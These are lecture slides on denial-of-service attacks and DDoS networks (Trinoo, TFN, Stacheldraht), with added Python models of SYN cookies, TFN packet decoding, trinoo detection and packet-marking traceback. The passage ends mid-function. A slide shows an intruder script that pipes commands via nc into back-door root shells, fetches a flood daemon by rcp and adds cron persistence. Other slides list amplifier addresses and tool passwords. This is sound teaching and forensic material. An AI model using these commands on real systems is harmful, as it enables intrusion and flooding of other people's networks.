Denial of Service
CS155, Spring Quarter
David Brumley, dbrumley@stanford.edu
Posted 21-Dec-2015
Overview
• Overview/History of DoS
• Traditional DoS
• DDoS
• Tracking DoS
• Preventative Measures
• Conclusion
Who are we talking about?
Script Kiddies
Exploit Writers
Computer Professionals
R&D Labs/Universities
Gov’t (NSA)
Example: GRC.COM
hi, its me, wicked, im the one nailing the server with
udp and icmp packets, nice sisco router, btw im 13, its
a new addition, nothin tracert cant handle, and ur on a
t3.....so up ur connection foo, we will just keep comin
at you, u cant stop us "script kiddies" because we are
better than you, plain and simple.
-------------------
Yo, u might not thing of this as anyomous, but its not real info, it’s a stolen earthlink, so its good, now, to speak of the implemented attacks, yeah its me, and the reason me and my 2 other contributers do this is because in a previous post you call us “script kiddies”, at least so I was told….
Classic DoS
• Fork/malloc() bomb
• Flooding
  – June 1996: 1st advisory on UDP flooding
• Theme: exploit a finite queue or an exposed, unoptimized interface
• Fix 1: limit the interface
• Fix 2: optimize the interface
Example: SYN Flooding
Diagram: hosts A and B; (1) SYN, (2) SYN-ACK, then ACK. The responder allocates half-open connection state when it sends the SYN-ACK and holds it until the ACK arrives; spoofed SYNs never complete the handshake, so the finite half-open queue fills and real clients are refused.
• Fix 1: minimal state cache at A
• Fix 2: SYN cookies
• Overall: fixing this is non-trivial programming
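The two fixes side by side, as an added example that is not code from the lecture: a stateful listener whose backlog fills under spoofed SYNs, and a SYN-cookie listener that keeps no half-open state and rebuilds the connection from the returning ACK. The cookie layout is the classic one (5 bits of coarse time, 3 bits of MSS index, 24 bits of keyed hash); the secret, the MSS table, the 64-second tick, the backlog size and all addresses are assumptions for the demo, and "packets" are plain Python values rather than TCP segments.

```python
"""SYN flood against a stateful listener vs. a SYN-cookie listener (a model, not a TCP stack)."""
import hashlib
import hmac
import random
import struct

SECRET = b"per-host secret, rotated periodically"   # assumption: demo key
MSS_TABLE = [536, 1300, 1440, 1460]                 # assumption: 3-bit index, largest entry <= offered MSS
TICK = 64                                           # seconds per coarse-timestamp tick
MAX_AGE = 2                                         # accept cookies minted within the last 2 ticks


def _hash24(saddr, daddr, sport, dport, t):
    """24-bit keyed hash of the 4-tuple and the tick (HMAC-SHA256, truncated)."""
    msg = struct.pack("!4s4sHHI", saddr, daddr, sport, dport, t)
    return int.from_bytes(hmac.new(SECRET, msg, hashlib.sha256).digest()[:3], "big")


def make_cookie(saddr, daddr, sport, dport, mss, now):
    """Server ISN for the SYN-ACK: 5 bits of tick, 3 bits of MSS index, 24 bits of hash."""
    t = int(now // TICK)
    idx = max([i for i, m in enumerate(MSS_TABLE) if m <= mss], default=0)
    return ((t & 0x1F) << 27) | (idx << 24) | _hash24(saddr, daddr, sport, dport, t)


def check_cookie(ack, saddr, daddr, sport, dport, now):
    """Validate the handshake's final ACK; return the MSS to use, or None if the cookie is bad or stale."""
    cookie = (ack - 1) & 0xFFFFFFFF
    t5, idx, h = cookie >> 27, (cookie >> 24) & 0x7, cookie & 0xFFFFFF
    if idx >= len(MSS_TABLE):
        return None
    t_now = int(now // TICK)
    for age in range(MAX_AGE + 1):          # the 5-bit field is t mod 32, so only recent ticks are tried
        t = t_now - age
        if (t & 0x1F) == t5 and _hash24(saddr, daddr, sport, dport, t) == h:
            return MSS_TABLE[idx]
    return None


class StatefulListener:
    """Classic handshake: one half-open entry per SYN until the ACK arrives (or a timeout;
    a flood refills the queue faster than entries expire, so timeouts are omitted here)."""

    def __init__(self, backlog):
        self.backlog, self.half_open, self.dropped = backlog, {}, 0

    def on_syn(self, saddr, sport):
        if len(self.half_open) >= self.backlog:
            self.dropped += 1                # queue full: legitimate SYNs are refused too
            return False
        self.half_open[(saddr, sport)] = True
        return True


class CookieListener:
    """SYN cookies: answer, keep nothing, rebuild the connection from the returning ACK."""

    def __init__(self, daddr=b"\x0a\x00\x00\x01", dport=80):   # assumption: server 10.0.0.1:80
        self.daddr, self.dport, self.established = daddr, dport, []

    def on_syn(self, saddr, sport, mss, now):
        return make_cookie(saddr, self.daddr, sport, self.dport, mss, now)   # no state stored

    def on_ack(self, saddr, sport, ack, now):
        mss = check_cookie(ack, saddr, self.daddr, sport, self.dport, now)
        if mss is not None:
            self.established.append((saddr, sport, mss))
        return mss


def simulate(n_spoofed=10_000, backlog=128, seed=1):
    """Flood both listeners with spoofed SYNs that never ACK, then try one legitimate handshake."""
    rng = random.Random(seed)
    classic, cookies = StatefulListener(backlog), CookieListener()
    for _ in range(n_spoofed):
        src, port = bytes(rng.randrange(256) for _ in range(4)), rng.randrange(1024, 65536)
        classic.on_syn(src, port)
        cookies.on_syn(src, port, 1460, now=1000.0)
    legit = (b"\xc0\xa8\x00\x02", 40000)                           # constructed client 192.168.0.2
    classic_ok = classic.on_syn(*legit)
    isn = cookies.on_syn(*legit, mss=1440, now=1000.0)
    ack = (isn + 1) & 0xFFFFFFFF
    mss = cookies.on_ack(*legit, ack=ack, now=1030.0)               # ACK arrives 30 s later: fresh
    stale = cookies.on_ack(*legit, ack=ack, now=1000.0 + 5 * TICK)  # same ACK replayed 5 ticks later
    return {"classic_accepted": classic_ok, "classic_dropped": classic.dropped,
            "cookie_mss": mss, "stale_accepted": stale is not None}


if __name__ == "__main__":
    print(simulate())
```

The cookie listener completes the legitimate handshake during the flood because nothing was stored per SYN, and it rejects the replayed ACK once the tick has aged out. The price is the "non-trivial programming" the slide mentions: options the cookie cannot encode (window scaling, SACK) are lost unless carried elsewhere, and the 24-bit hash is the only thing standing between an attacker who can guess ACKs and a forged connection, so the secret must rotate.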
Most Prevalent Attacks
• Jolt/jolt2: IP fragment reassembly (UDP and TCP)
• Stream/raped: flood with ACKs
• Trash: IGMP flooding
• Mixed UDP/TCP/ICMP flooding
• Starting to target routers instead of hosts
Distributed Attack: Smurf
• Spoofed ICMP echo requests are sent to a network’s broadcast address; every host on that network (10’s to 100’s of hosts) replies to the spoofed source, the victim.
Amplification Networks
• Netscan.org listed broadcast addresses by the number of hosts that reply:
  – 210.95.3.128: 427 (Korea)
  – 203.252.30.0: 401 (Korea)
  – 203.252.30.255: 390 (Korea)
  – 210.95.3.255: 300 (Korea)
  – 130.87.223.255: 174 (Japan)
  – 206.101.110.127 (US)
• Average amplification: 4
Ping Attack
A single echo request (seq=13) is sent to 206.101.110.127, one of the amplifier addresses listed above; the replies on the following slides all answer that one request.
PING 206.101.110.127: 56 data bytes
no reply from 206.101.110.127 within 1 sec
no reply from 206.101.110.127 within 1 sec
no reply from 206.101.110.127 within 1 sec
no reply from 206.101.110.127 within 1 sec
….
Ping Attack
64 bytes from 206.101.110.1: seq=13 ttl=21 time=127 ms.
64 bytes from 206.101.110.1: seq=13 ttl=21 time=171 ms, duplicate.
64 bytes from 206.101.110.1: seq=13 ttl=21 time=175 ms, duplicate.
64 bytes from 206.101.110.1: seq=13 ttl=21 time=181 ms, duplicate.
64 bytes from 206.101.110.1: seq=13 ttl=21 time=185 ms, duplicate.
64 bytes from 206.101.110.1: seq=13 ttl=21 time=216 ms, duplicate.
64 bytes from 206.101.110.1: seq=13 ttl=21 time=220 ms, duplicate.
64 bytes from 206.101.110.1: seq=13 ttl=21 time=222 ms, duplicate.
64 bytes from 206.101.110.1: seq=13 ttl=21 time=229 ms, duplicate.
64 bytes from 206.101.110.1: seq=13 ttl=21 time=230 ms, duplicate.
64 bytes from 206.101.110.1: seq=13 ttl=21 time=241 ms, duplicate.
64 bytes from 206.101.110.1: seq=13 ttl=21 time=243 ms, duplicate.
64 bytes from 206.101.110.1: seq=13 ttl=21 time=248 ms, duplicate.
64 bytes from 206.101.110.1: seq=13 ttl=21 time=254 ms, duplicate.
64 bytes from 206.101.110.1: seq=13 ttl=21 time=259 ms, duplicate.
….
Ping Attack
64 bytes from 206.101.110.1: seq=13 ttl=21 time=1513 ms, duplicate.
64 bytes from 206.101.110.1: seq=13 ttl=21 time=1518 ms, duplicate.
64 bytes from 206.101.110.1: seq=13 ttl=21 time=1518 ms, duplicate.
….
64 bytes from 206.101.110.1: seq=13 ttl=21 time=1571 ms, duplicate.
64 bytes from 206.101.110.1: seq=13 ttl=21 time=1571 ms, duplicate.
64 bytes from 206.101.110.1: seq=13 ttl=21 time=1572 ms, duplicate.
64 bytes from 206.101.110.1: seq=13 ttl=21 time=1572 ms, duplicate.
….
Ping Attack
packet seq=13 bounced at radio-adventures-corp.Washington.cw.net (208.173.12.42): Time to live exceeded
packet seq=13 bounced at radio-adventures-corp.Washington.cw.net (208.173.12.42): Time to live exceeded
packet seq=13 bounced at 208.155.245.6: Time to live exceeded
packet seq=13 bounced at 208.155.245.6: Time to live exceeded
packet seq=13 bounced at 208.155.245.6: Time to live exceeded
packet seq=13 bounced at 208.155.245.6: Time to live exceeded
packet seq=13 bounced at bar6-loopback.Washington.cw.net (206.24.226.11): Time to live exceeded
packet seq=13 bounced at 208.155.245.6: Time to live exceeded
packet seq=13 bounced at 208.155.245.6: Time to live exceeded
64 bytes from 206.101.110.1: seq=13 ttl=21 time=6917 ms, duplicate.
packet seq=13 bounced at bar6-loopback.Washington.cw.net (206.24.226.11): Time to live exceeded
Bad guy’s point of view
• What to do if smurf no longer works?
  – Admins could disable (directed) broadcast
  – Admins could filter traffic from broadcast networks
Distributed DoS
Diagram: three tiers, the attacker’s Client, the Handlers/Masters it controls, and the Agents/Daemons that send the flood.
Building DDoS Networks
• Launch exploit
• Log in through back door
• Install daemon
• Install "rootkit" to hide daemon
• Repeat
Result of Exploit
Normal System:
sunset:security> telnet elaine
Trying 171.64.15.86...
Connected to elaine21.stanford.edu.
Escape character is '^]'.

UNIX(r) System V Release 4.0 (elaine21.Stanford.EDU)

elaine21.Stanford.EDU login:

Hacked System (back door: a root shell listening on port 1524):
sunset:security> telnet jimi-hendrix 1524
Trying 171.65.38.180...
Connected to jimi-hendrix.Stanford.EDU (171.65.38.180).
Escape character is '^]'.
# ls -altr /;
total 1618
-r-xr-xr-x 1 root root 1541 Oct 14 1998 .cshrc
drwx------ 2 root root 8192 Apr 14 1999 lost+found
drwxr-xr-x 1 root root    9 Apr 14 1999 bin
drwxrwxr-x 2 root sys   512 Apr 14 1999 mnt
Example Intruder Script
• Automated exploit: the same script is piped into the back-door port of every compromised host
./trin.sh | nc 128.aaa.167.217 1524 &
./trin.sh | nc 128.aaa.167.218 1524 &
./trin.sh | nc 128.aaa.167.219 1524 &
./trin.sh | nc 128.aaa.187.38 1524 &
./trin.sh | nc 128.bbb.2.80 1524 &
./trin.sh | nc 128.bbb.2.81 1524 &
./trin.sh | nc 128.bbb.2.238 1524 &
./trin.sh | nc 128.ccc.12.22 1524 &
./trin.sh | nc 128.ccc.12.50 1524 &
• trin.sh
echo "rcp 192.168.0.1:leaf /usr/sbin/rpc.listen"
echo "echo rcp is done moving binary"
echo "chmod +x /usr/sbin/rpc.listen"
echo "echo launching trinoo"
echo "/usr/sbin/rpc.listen"
echo "echo \* \* \* \* \* /usr/sbin/rpc.listen > cron"
echo "crontab cron"
echo "echo launched"
echo "exit"
RCP
Jun 30 07:55:12 6E:rmt_sgi3 rshd[8111]: [email protected] as demos: cmd='/usr/lib/sunw,rcp -f neet.tar'
Jun 30 07:55:12 6E:rmt_sgi3 rshd[8112]: [email protected] as demos: cmd='/usr/lib/sunw,rcp -f neet.tar'
Jun 30 07:55:12 6E:rmt_sgi3 rshd[8113]: [email protected] as demos: cmd='/usr/lib/sunw,rcp -f neet.tar'
Jun 30 07:55:12 6E:rmt_sgi3 rshd[8117]: [email protected] as demos: cmd='/usr/lib/sunw,rcp -f neet.tar'
Jun 30 07:55:12 6E:rmt_sgi3 rshd[8124]: [email protected] as demos: cmd='rcp -f neet.tar'
Jun 30 07:55:12 6E:rmt_sgi3 rshd[8127]: [email protected] as demos: cmd='rcp -f neet.tar'
….
Over 200 hosts compromised!
DDoS Networks
• Trinoo: June/July 1999
• TFN: August/September 1999
• Stacheldraht: Sept/October 1999
• IRC Botnet: More recent
Trinoo Overview
• Communication
  – Attacker to master(s): 27665/tcp
  – Master to daemon(s): 27444/udp
  – Daemon to master(s): 31335/udp
• List of masters hard coded into the daemons
• UDP flooder
Trinoo Master
• Daemon list Blowfish encrypted
• crypt() password required for startup
# ./master
?? wrongpassword
# . . .
# ./master
?? gOrave
trinoo v1.07d2+f3+c
Trinoo Master Commands
• die
• mtimer (set DoS timer)
• dos IP
• mdie (password required)
• mping - send "PING" command, should get a "PONG"
• mdos
• info - print version information
• msize - Set DoS packet size
• killdead - Solicits "*HELLO*" from clients, else removes entry
• bcast - list hosts
• mstop - attempt to stop DoS. Not implemented :)
Analysis of Handler
# strings - master
. . .
---v
v1.07d2+f3+c
trinoo %s
l44adsl                    <- Cleartext daemon password
sock
0nm1VNMX…                  <- crypt(g0rave) local master
10:09:24
Sep 26 1999
trinoo %s [%s:%s]
bind
read
*HELLO*
ZsoTN.cq4X31               <- Blowfish crypt key
bored
NEW Bcast - %s
PONG
PONG %d Received from %s
Warning: Connection from %s
beUBZbLtK7kkY              <- crypt(betalmostdone)
trinoo %s..[rpm8d/cb4Sx/]
. . .
DoS: usage: dos
DoS: Packeting %s.
aaa %s %s
mdie
ErDVt6azHrePE              <- crypt(killme) for mdie
mdie: Disabling Bcasts.
d1e %s
mdie: password?
Daemon Forensics
• Starting the daemon (the "client") sends "*HELLO*" to the master
• Commands have the form "arg1 password arg2":
  – aaa pass IP: DoS IP on random UDP ports
  – bbb pass N: sets the time limit
  – png pass: sends a "PONG" to the master on port 31335/udp
  – d1e pass: ...
• Note that UNIX strings by default only displays runs of 4 or more ASCII characters, so the 3-letter commands are missed unless the threshold is lowered!
# strings --bytes=3 ns | tail -15
socket
bind
recvfrom
l44
%s %s %s
aIf3YWfOhw.V.
aaa
bbb
shi
png
PONG
d1e
rsz
xyz
*HELLO*
Trinoo LSOF
# lsof | egrep ":31335|:27665"
master 1292 root 3u inet 2460 UDP *:31335
master 1292 root 4u inet 2461 TCP *:27665 (LISTEN)
# lsof -p 1292
COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME
master 1292 root cwd DIR 3,1 1024 14356 /tmp/...
master 1292 root rtd DIR 3,1 1024 2 /
master 1292 root txt REG 3,1 30492 14357 /tmp/.../master
master 1292 root mem REG 3,1 342206 28976 /lib/ld-2.1.1.so
master 1292 root mem REG 3,1 63878 29116 /lib/libcrypt-2.1.1.so
master 1292 root mem REG 3,1 4016683 29115 /lib/libc-2.1.1.so
master 1292 root 0u CHR 4,1 2967 /dev/tty1
master 1292 root 1u CHR 4,1 2967 /dev/tty1
master 1292 root 2u CHR 4,1 2967 /dev/tty1
master 1292 root 3u inet 2534 UDP *:31335
master 1292 root 4u inet 2535 TCP *:27665 (LISTEN)
Trinoo Forensics
• Master IP addresses visible
• Enough strings to recognize daemon/master easily
• Listening TCP/UDP ports can be seen with "lsof"
• Attacker session not encrypted
Tribal Flood Network
• Communication:
  – Client to handler: none (the tfn client is run on the handler itself)
  – Handler <-> agent: ICMP Echo Reply
• DoS types:
  – SYN
  – UDP
  – ICMP
  – with spoofing capabilities
TFN Handler
--------------------------------------------------------------
[tribe flood network] (c) 1999 by Mixter

usage: ./tfn <iplist> <type> [ip] [port]
<iplist>  contains a list of numerical hosts that are ready to flood
<type>    -1 for spoofmask type (specify 0-3), -2 for packet size,
          is 0 for stop/status, 1 for udp, 2 for syn, 3 for icmp,
          4 to bind a rootshell (specify port)
          5 to smurf, first ip is target, further ips are broadcasts
[ip]      target ip[s], separated by @ if more than one
[port]    must be given for a syn flood, 0 = RANDOM
--------------------------------------------------------------------
TFN Commands
#define ID_ACK     123 /* for replies to the client */
#define ID_SHELL   456 /* to bind a rootshell, optional */
#define ID_PSIZE   789 /* to change size of udp/icmp packets */
#define ID_SWITCH  234 /* to switch spoofing mode */
#define ID_STOPIT  567 /* to stop flooding */
#define ID_SENDUDP 890 /* to udp flood */
#define ID_SENDSYN 345 /* to syn flood */
#define ID_SYNPORT 678 /* to set port */
#define ID_ICMP    901 /* to icmp flood */
#define ID_SMURF   666 /* haps! haps! */
Identifying an Agent
lsof output for the TFN agent process "td" (the last line is the raw socket it uses to craft packets, which lsof cannot map to a protocol):
------------------------------------------------------------------------------
td 5931 root cwd DIR 3,5 1024 240721 /usr/lib/libx/...
td 5931 root rtd DIR 3,1 1024 2 /
td 5931 root txt REG 3,5 297508 240734 /usr/lib/libx/.../td
td 5931 root 3u sock 0,0 92814 can't identify protocol
------------------------------------------------------------------------------
Network Example
# ./tfn iplist 4 12345
[tribe flood network] (c) 1999 by Mixter

# tcpdump -lnx -s 1518 icmp
tcpdump: listening on eth0
05:51:32.706829 10.0.0.1 > 192.168.0.1: icmp: echo reply
.... .... .... .... .... .... .... .... .... ....
0000 64d1 01c8 0000 3132 3334 35
  <- ICMP id 0x01C8 = 456 (ID_SHELL); "12345", the port, in the data portion
05:51:32.741556 192.168.0.1 > 10.0.0.1: icmp: echo reply
.... .... .... .... .... .... .... .... .... ....
0000 6cae 007b 0000 7368 656c 6c20 626f 756e 6420 746f 2070 6f72 7420 3132 3334 350a 00
  <- ICMP id 0x007B = 123 (ID_ACK); data "shell bound to port 12345"
(The "...." groups stand for the 20-byte IP header, omitted on the slide.)
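The decoding above done in code, as an added example that is neither TFN’s source nor the lecture’s: it parses the ICMP portion of the two echo replies from the tcpdump output (hex transcribed from the slide, IP header omitted), verifies the checksum, maps the identifier field to the command table from the previous slide, and rebuilds the same messages from their fields. The command names are the ones in TFN’s own #defines; everything else is assumed for the demo.

```python
"""Decode TFN handler<->agent commands carried in ICMP echo replies."""
import struct

# Command ids from the TFN source excerpt on the previous slide.
TFN_IDS = {
    123: "ID_ACK", 456: "ID_SHELL", 789: "ID_PSIZE", 234: "ID_SWITCH", 567: "ID_STOPIT",
    890: "ID_SENDUDP", 345: "ID_SENDSYN", 678: "ID_SYNPORT", 901: "ID_ICMP", 666: "ID_SMURF",
}

# ICMP portion of the two echo replies in the tcpdump output above (IP header omitted).
HANDLER_TO_AGENT = "0000 64d1 01c8 0000 3132 3334 35"
AGENT_TO_HANDLER = ("0000 6cae 007b 0000 7368 656c 6c20 626f 756e 6420 746f 2070 "
                    "6f72 7420 3132 3334 350a 00")


def icmp_checksum(data):
    """RFC 1071 one's-complement sum of 16-bit words; an odd trailing byte is zero-padded."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_echo_reply(ident, data, seq=0):
    """ICMP echo reply (type 0) with the command id in the identifier field, as TFN does."""
    header = struct.pack("!BBHHH", 0, 0, 0, ident, seq)
    return struct.pack("!BBHHH", 0, 0, icmp_checksum(header + data), ident, seq) + data


def parse_icmp(hexdump):
    """Split an ICMP message into header fields and payload; checksum_ok verifies the whole message."""
    raw = bytes.fromhex(hexdump.replace(" ", ""))
    icmp_type, code, _csum, ident, seq = struct.unpack("!BBHHH", raw[:8])
    return {"type": icmp_type, "code": code, "id": ident, "seq": seq,
            "data": raw[8:], "checksum_ok": icmp_checksum(raw) == 0}


def classify_tfn(pkt):
    """(command name, payload text) if this echo reply carries a known TFN id, else None."""
    if pkt["type"] != 0 or pkt["id"] not in TFN_IDS:
        return None
    text = pkt["data"].rstrip(b"\x00").decode("ascii", "replace")
    return TFN_IDS[pkt["id"]], text


if __name__ == "__main__":
    for label, dump in (("handler->agent", HANDLER_TO_AGENT), ("agent->handler", AGENT_TO_HANDLER)):
        pkt = parse_icmp(dump)
        print(label, "id=%d" % pkt["id"], "checksum_ok=%s" % pkt["checksum_ok"], classify_tfn(pkt))
```

Both dumps verify against their checksums and the builder reproduces them byte for byte, which confirms the layout: type 0, code 0, checksum, the command id where a ping would put its identifier, a zero sequence number, and an ASCII argument. Matching on the id alone is a weak signature, since an ordinary ping can use the same identifier (typically its pid); in practice corroborate with echo replies that have no matching request, or with the lsof view of the agent shown above.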
Forensics
• Easy to spot in lsof (+)
• ICMP easy to disguise (-)
• ICMP ECHO_REPLY often allowed through the firewall (-)
• Attacker’s session not encrypted
Stacheldraht
• Communication:
  – Client <-> Handler: 16660/tcp
  – Handler <-> agent: 65000/tcp, ICMP_ECHOREPLY
  – Doesn’t use agent TCP for anything on versions I’ve seen
• Client/handler traffic Blowfish encrypted
• UDP/TCP/ICMP flooding w/ spoofing
Stacheldraht Client and Handler
• Client to handler blowfish encrypted w/ password “authentication”
• Handler password “sicken” encrypted with crypt()
• More proactive at identifying live/dead hosts: Similar to distributed network
• Handler limited to 1000 agents
Handler Strings
starting trinoo emulation...
removing useful commands.
- DONE -
available commands in this version are:
--------------------------------------------------
.mtimer .mudp .micmp .msyn .msort .mping
.madd .mlist .msadd .msrem .distro .help
.setusize .setisize .mdie .sprange .mstop .killall
.showdead .showalive
usage: .distro <user> <server that runs rcp>
remember : the distro files need to be executable!
that means: chmod +x linux.bin , chmod +x sol.bin ;))
sending distro request to all bcasts....
user : %s
rcp server :
Stacheldraht Agent
• Interesting addition: Upgrade feature via rcp
• Attempts spoofed packet to handler to test if spoofing is possible
• Handlers compiled in or can be in blowfish encrypted file (def pass = “randomsucks”)
• On start sends to handler ID value 666 with data “skillz”, handler responds 667 with data “ficken”
DoS BotNets
• Scan for vulnerable hosts
• Infect
• Join an IRC channel and wait for further commands
• Generally used for warez distribution as well
• Example: Kaiten
Fighting DDoS: Identify Agents
• The master’s address appears as a string in the daemon
• Finding the master is important!
• Dump and log as much as possible
Identifying DDoS Agents
• Counter-espionage/intrusion
  – Identify the intruder’s signature
  – Look for that signature
• RID
RID Examples
start AgentStacheldraht
send icmp type=0 id=668 data=""
recv icmp type=0 id=669 data="sicken" nmatch=2
end AgentStacheldraht
start AgentStacheldraht4
send icmp type=0 id=6268 data=""
recv icmp type=0 id=669 data="sicken" nmatch=2
end AgentStacheldraht4
More RID Examples
start AgentTFN
send icmp type=0 id=789
recv icmp type=0 id=123 nmatch=2
end AgentTFN
start AgentTrinoo
send udp dport=27444 data="png l44adsl"
recv udp data="PONG" nmatch=1
end AgentTrinoo
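The AgentTrinoo signature above, and the daemon command grammar from the Daemon Forensics slide, as one runnable model. This is an added example, not the RID tool and not trinoo code: the daemon class only emulates the "cmd password [arg]" parser (floods are recorded, never sent), the probe mirrors the signature as data, and no sockets are opened; hosts are callables that return the datagrams they would emit. Host addresses, the master address and the "changed" password are constructed for the demo; the default daemon password l44adsl and the ports are the ones in the strings output.

```python
"""RID-style active probing for trinoo daemons, run against an offline model of the daemon."""
from dataclasses import dataclass

TRINOO_DAEMON_PORT = 27444            # master -> daemon (udp)
TRINOO_MASTER_PORT = 31335            # daemon -> master (udp)
DEFAULT_DAEMON_PASSWORD = b"l44adsl"  # sits in cleartext in the binary (see the strings output)


class TrinooDaemonModel:
    """Emulates the daemon's command parser only: 'cmd password [arg]' on 27444/udp.
    Floods are recorded, never sent; this is a model for testing detection logic."""

    def __init__(self, masters, password=DEFAULT_DAEMON_PASSWORD):
        self.masters, self.password = list(masters), password
        self.targets, self.time_limit, self.alive = [], None, True

    def start(self):
        """On startup the daemon announces itself to every hard-coded master."""
        return [(m, TRINOO_MASTER_PORT, b"*HELLO*") for m in self.masters]

    def handle(self, datagram, src):
        """Process one datagram; return the list of (dst_ip, dst_port, payload) it would send."""
        if not self.alive:
            return []
        parts = datagram.split()
        if len(parts) < 2 or parts[1] != self.password:
            return []                                   # wrong password: silently ignored
        cmd, arg = parts[0], (parts[2] if len(parts) > 2 else None)
        if cmd == b"png":                               # liveness check: PONG goes to the master port
            return [(src, TRINOO_MASTER_PORT, b"PONG")]
        if cmd == b"aaa" and arg:                       # DoS <ip> on random UDP ports (recorded only)
            self.targets.append(arg.decode("ascii", "replace"))
        elif cmd == b"bbb" and arg:                     # set the flood time limit
            self.time_limit = int(arg)
        elif cmd == b"d1e":                             # shut down
            self.alive = False
        return []


@dataclass
class Signature:
    """A RID signature: send a datagram to dport, count replies that contain `expect`."""
    name: str
    dport: int
    send: bytes
    expect: bytes
    nmatch: int = 1


# The AgentTrinoo signature from the RID examples, as data.
AGENT_TRINOO = Signature("AgentTrinoo", TRINOO_DAEMON_PORT, b"png " + DEFAULT_DAEMON_PASSWORD, b"PONG")


def probe(responder, sig, scanner_ip="10.0.0.9"):
    """True if the host answers sig.send with at least sig.nmatch replies containing sig.expect.
    A responder is a callable (dport, datagram, src_ip) -> [(dst_ip, dst_port, payload)]."""
    replies = responder(sig.dport, sig.send, scanner_ip)
    hits = sum(1 for _ip, _port, payload in replies if sig.expect in payload)
    return hits >= sig.nmatch


def sweep(hosts, sig):
    """Probe every host in {ip: responder}; return the sorted list of matches."""
    return sorted(ip for ip, responder in hosts.items() if probe(responder, sig))


def demo():
    """Constructed network: a stock daemon, a UDP echo service, a silent host,
    and a daemon rebuilt with a different password."""
    daemon = TrinooDaemonModel(masters=["192.0.2.10"])
    rebuilt = TrinooDaemonModel(masters=["192.0.2.10"], password=b"changed")

    def on_port(d, port):
        return lambda dport, dgram, src: d.handle(dgram, src) if dport == port else []

    hosts = {
        "198.51.100.5": on_port(daemon, TRINOO_DAEMON_PORT),
        "198.51.100.6": lambda dport, dgram, src: [(src, dport, dgram)],   # echo: noise, not an agent
        "198.51.100.7": lambda dport, dgram, src: [],                      # silent
        "198.51.100.8": on_port(rebuilt, TRINOO_DAEMON_PORT),              # missed by the stock signature
    }
    return daemon.start(), sweep(hosts, AGENT_TRINOO)


if __name__ == "__main__":
    hello, infected = demo()
    print("startup traffic:", hello)
    print("infected:", infected)
```

Two things the model makes visible. The PONG is addressed to 31335/udp on the probing host, not to the source port of the probe, so a real scanner has to listen there. And the signature only finds daemons built with the stock password: the rebuilt daemon on 198.51.100.8 ignores the probe, which is why the forensics slides insist on pulling the strings out of each captured binary before writing the signature.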
RID @ Stanford
• Signature for a back-door telnetd:
start telnetd
send tcp dport=7000 data="\r\n"
recv tcp data="Ataman Telnetd" nmatch=1
end telnetd
• ./rid -t 20 -b 255 -n 2 171.64.0.0/16
**** 171.64.250.82 infected with telnetd
**** 171.64.245.132 infected with telnetd
**** 171.64.245.76 infected with telnetd
**** 171.64.245.22 infected with telnetd
**** 171.64.241.116 infected with telnetd
…
• 156 total!
General DDoS Observations
• Intruders mix encryption mechanisms
• No architecture in security design
• Easily recognizable via strings
Defending against DoS
• Resisting DoS
  – Filtering
  – Traffic shaping
  – Pure filtering
• Ingress = incoming, Egress = outgoing: filtering at the network edge that drops packets whose source address could not legitimately arrive from that direction, which stops spoofed traffic at its origin
• Locating attacker(s)
  – Logging
  – Automatic trace back
  – Packet tagging
Logging
• Audit utilities:
  – tcpdump
  – Argus
  – Cisco NetFlow
• Problem: huge data sets
• Asta.com: NetFlow monitor
Input Logging
1. Log on to the nearest router
2. Enable input debugging on the router
3. Find the upstream router
4. Recurse
Controlled Flooding
• Cheswick & Burch
• Idea: flood the candidate upstream links in turn and watch which one perturbs the attack stream, i.e. follow the slowest routers
• Problems: obvious (the trace is itself a flood of other people’s links, and it needs a map of the upstream topology)
Diagram: attacker, routers R1, R2, R3, victim.
Node Sampling (Savage et al., Method 1)
• Use the IP fragment ID field
• Each router overwrites the mark with its own address with probability p
• Issues:
  – needs p > 0.5
  – long time to infer the path (-)
  – multiple attackers at the same distance are indistinguishable (-)
Diagram: attacker -> R6 ... R1 -> victim. The victim receives a mark from the router d hops away with probability p(1-p)^(d-1): p for R1, p(1-p) for R2, p(1-p)^2 for R3, so distant routers are seen rarely.
Method 2: Edge Sampling
• Add 3 fields:
  – 2 IP addresses making up the edge
  – a distance counter
• Issues:
  – space requirements (-)
  – p can be arbitrary (+)
  – complexity (-)
Diagram: routers R1 to R6 between attacker A and the victim; marked edges written as (Src, Dst): (A, R3), (R3, R2), (R2, R6).
Savage’s Compression Method
• Step 1: router a decides with prob. p to fill in the edge ID with its own address and sets d=0
• Step 2a: the next hop b sees d=0, writes b xor a into the edge field; d++
• Step 2b: each further hop sees d != 0 and only does d++
Diagram: attacker A -> R3 -> R2 -> R1 -> victim V. V recovers the path one hop at a time: a mark with d=0 carries R1’s address directly; with d=1 the field holds R2 xor R1, and (R2 xor R1) xor R1 = R2; with d=2 it holds R3 xor R2, and (R3 xor R2) xor R2 = R3.
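The marking rule and the victim-side reconstruction above as a simulation, added here and not taken from the paper. Routers are 32-bit addresses held as ints, and the per-packet mark is modelled as a full-width edge field plus a distance counter; the real scheme squeezes that into the 16-bit IP identification field by fragmenting the edge id across packets and adding a hash to validate the pieces, which is omitted. The path, p, packet counts and the forged initial values are assumptions for the demo.

```python
"""Compressed edge sampling (Savage et al.): marking at routers, reconstruction at the victim."""
import math
import random
from collections import Counter, defaultdict


def mark(packet, router, p, rng):
    """One router's marking step (mutates packet). router is a 32-bit address as an int."""
    if rng.random() < p:                   # start a new edge here: write own address, distance 0
        packet["edge"], packet["dist"] = router, 0
    else:
        if packet["dist"] == 0:            # we are the far end of an edge begun one hop back
            packet["edge"] ^= router
        packet["dist"] += 1                # every non-marking router counts one more hop


def forward(path, p, rng, edge0=0, dist0=0):
    """Send one packet along path (attacker side first); edge0/dist0 are the attacker's initial values."""
    pkt = {"edge": edge0, "dist": dist0}
    for router in path:
        mark(pkt, router, p, rng)
    return pkt


def collect(path, p, n, seed, edge0=0, dist0=0):
    """(edge, dist) marks of n attack packets as the victim receives them."""
    rng = random.Random(seed)
    return [(pk["edge"], pk["dist"]) for pk in (forward(path, p, rng, edge0, dist0) for _ in range(n))]


def reconstruct(samples):
    """Rebuild a single attack path, victim side first: hop[d+1] = edge(d) xor hop[d].
    Stops at the first distance with no samples. Whatever decodes beyond the real routers
    is the attacker's own initial field value, not a router (forged marks can only land at
    distances >= the true path length because every router increments d)."""
    if not samples:
        return []
    by_dist = defaultdict(Counter)
    for edge, dist in samples:
        by_dist[dist][edge] += 1
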